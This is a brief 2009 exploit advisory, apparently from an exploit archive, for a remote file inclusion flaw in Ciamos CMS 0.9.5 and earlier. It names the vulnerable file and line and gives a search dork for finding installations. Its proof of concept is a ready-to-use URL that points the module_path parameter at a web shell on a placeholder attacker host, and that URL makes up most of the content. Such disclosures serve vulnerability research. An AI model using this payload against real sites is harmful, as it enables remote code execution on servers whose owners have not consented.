[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ] ######################################################################## #Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability #Download Script : http://sourceforge.net/projects/ciamosmodules/files/ #Dork : die("Hacking attempt"); :D ######################################################################## # #Vuln : ./ciamos/modules/pms/index.php (line 13) # #PoC : http://server/modules/pms/index.php?module_path=http://[attacker]/shell.txt??? # ######################################################################## ######################################################################## ####################[90r0nt4l0 und3r9r0nd c0mmun1ty]#################### ######################################################################## ######################################################################## [ Gorontalo / 2009 ]